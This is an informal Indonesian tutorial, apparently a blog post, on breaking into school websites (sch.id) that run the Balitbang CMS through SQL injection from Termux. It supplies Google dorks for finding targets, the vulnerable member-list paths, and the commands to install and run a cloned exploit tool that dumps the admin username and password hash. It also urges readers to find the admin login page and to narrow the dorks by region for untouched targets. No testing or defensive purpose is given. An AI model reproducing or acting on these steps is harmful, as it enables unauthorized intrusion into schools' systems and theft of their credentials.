Yoo wasap para nolep h3h3 santuy ea bujank, okeh di tutorial kali ini
saya akan ngasih tool auto exploit sqli cms balitbang di termux, yang
dibuat oleh bang Afrizall okeh gausah basa-basi lagi gimana cara install dan cara gunain toolnya di termux.
Pertama cari target dulu yah, gaada target apa yang mau di eksekusi
sayang:v santuy dah disiapin dorknya kok hehe, ngedork dulu yegan
Dork :
intext:"Setup by Website Sekolah Gratis." Ulangan Site:sch.id
intext:"Setup by cmssekolahku." cbt site:sch.id
intext:"Setup by Website Sekolah Gratis." rudi site:sch.id
intext:"Setup by Website Sekolah Gratis." guru bahasa site:sch.id
Kembangin lagi ea bujank, okeh kalau udh dapat tambahin exploitnya
Exploit :
users/listmemberall.php
member/listmemberall.php
Kalau vuln, tandanya gini, blank putih ea gan
Lanjut kalau udah nemu yang seperti diatas kita exploit lewat termux, install dulu toolnya
$ pkg install git; pkg install phpJika sudah kita clone tool exploitnya dari reponya
$ git clone https://github.com/Afrizall/balitbang-sqli-post-dataLalu buka foldernya dan jalankan toolnya sekaligus masukan targetnya, berikut perintahnya
$ php balitbang.php https://target.url/exploitKalau work bakal muncul user sekaligus password adminya yang masih dalam bentuk hash
Okeh tutorialnya udah selesai sebenarnya, kalian tinggal cari login
adminya saja ea bujank:* untuk dork silahkan kembangkan lagi dengan
menambahkan nama kota, kabupaten atau daerah tertentu agar kalian bisa
mendapatkan target yang fresh alias perawan:v buat yang failed saat
exploit, kalian bisa gunakan tool martabak balitbang.
martabak SQLi balitbang tool : exploit SQLi balitbang
spesial thanks to : Afrizal - ./N4zi404_ - ./botkiller - Junx$care